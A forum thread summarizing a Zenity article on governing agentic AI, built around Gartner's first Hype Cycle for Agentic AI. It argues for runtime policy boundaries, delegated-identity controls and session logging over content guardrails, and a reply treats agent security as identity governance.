Notifications
Clear all
Topic starter
06/06/2026 2:24 am
TL;DR: Gartner’s inaugural Hype Cycle for Agentic AI signals that agentic AI security has moved from speculation to a distinct market category, while Zenity argues that guardrails are not enough because agents need enforced boundaries, runtime context, and DFIR-grade traceability to govern actions safely. The real failure point is not the model but the delegated identity acting across systems at machine speed.
NHIMG editorial — based on content published by Zenity: Agents Need Boundaries. The Market Is Starting to Agree
By the numbers:
- Gartner publishes over 130 Hype Cycles a year, and the inaugural Hype Cycle for Agentic AI arrived in April ahead of the usual June to August window.
Questions worth separating out
Q: How should security teams govern AI agents that can act across multiple enterprise systems?
A: Security teams should govern them as delegated identities with runtime authorisation, not as chat interfaces with safety filters.
Q: Why do guardrails fail to secure agentic AI workflows?
A: Guardrails fail because they are probabilistic and operate on model output, while the risk lives in the execution chain.
Q: What breaks when AI agents are reviewed like human users?
A: Human review assumes access is stable long enough to be observed, approved, and recertified.
Practitioner guidance
- Define runtime boundaries for agent actions Map every high-risk agent workflow to a pre-execution policy decision that evaluates identity, target system, data sensitivity, and destination before any tool call is allowed.
- Separate delegated action from model output Stop relying on prompt filtering as the control layer.
- Instrument session-level evidence chains Log reasoning traces, tool invocations, data touched, and resulting actions in a way that supports reconstruction after an incident, not just alerting in real time.
What's in the full article
Zenity's full analysis covers the operational detail this post intentionally leaves for the source:
- Specific examples of how enforced boundaries differ from content guardrails in live agent workflows
- The article's full discussion of runtime policy engines and why context matters before execution
- Zenity's DFIR-oriented view of session reconstruction, evidence quality, and incident handling for manipulated agents
- The market framing behind guardian agents and why human oversight does not scale across thousands of agents
👉 Read Zenity's analysis of agentic AI security boundaries and governance →
Agentic AI security and boundaries: what should teams do now?
Explore further
06/06/2026 4:04 am
Agentic AI security is no longer a model-safety issue, it is an identity and authorisation issue. The article correctly shifts the centre of gravity from hallucinations and prompt injection to delegated runtime action. Once an agent can touch CRM, email, Slack, and external APIs, the control problem becomes who or what is allowed to act, on which data, under which context. Practitioners should stop treating agent safety as a separate AI topic and place it inside identity governance.
A few things that frame the scale:
- 98% of companies plan to deploy even more AI agents within the next 12 months, despite documented rogue behaviour in 80% of current deployments, according to AI Agents: The New Attack Surface report.
- Only 52% of companies can track and audit the data their AI agents access, leaving 48% with a complete blind spot for compliance and breach investigation.
A question worth separating out:
Q: Who is accountable when an AI agent makes an unauthorised change?
A: Accountability should be assigned to the governance model that authorised the delegation, the owner of the workflow, and the team that set the policy boundary. In practice, organisations need clear responsibility for agent configuration, monitoring, and incident response because the machine’s speed does not remove human accountability for the delegated identity.
👉 Read our full editorial: Agents need boundaries as agentic AI security becomes a category
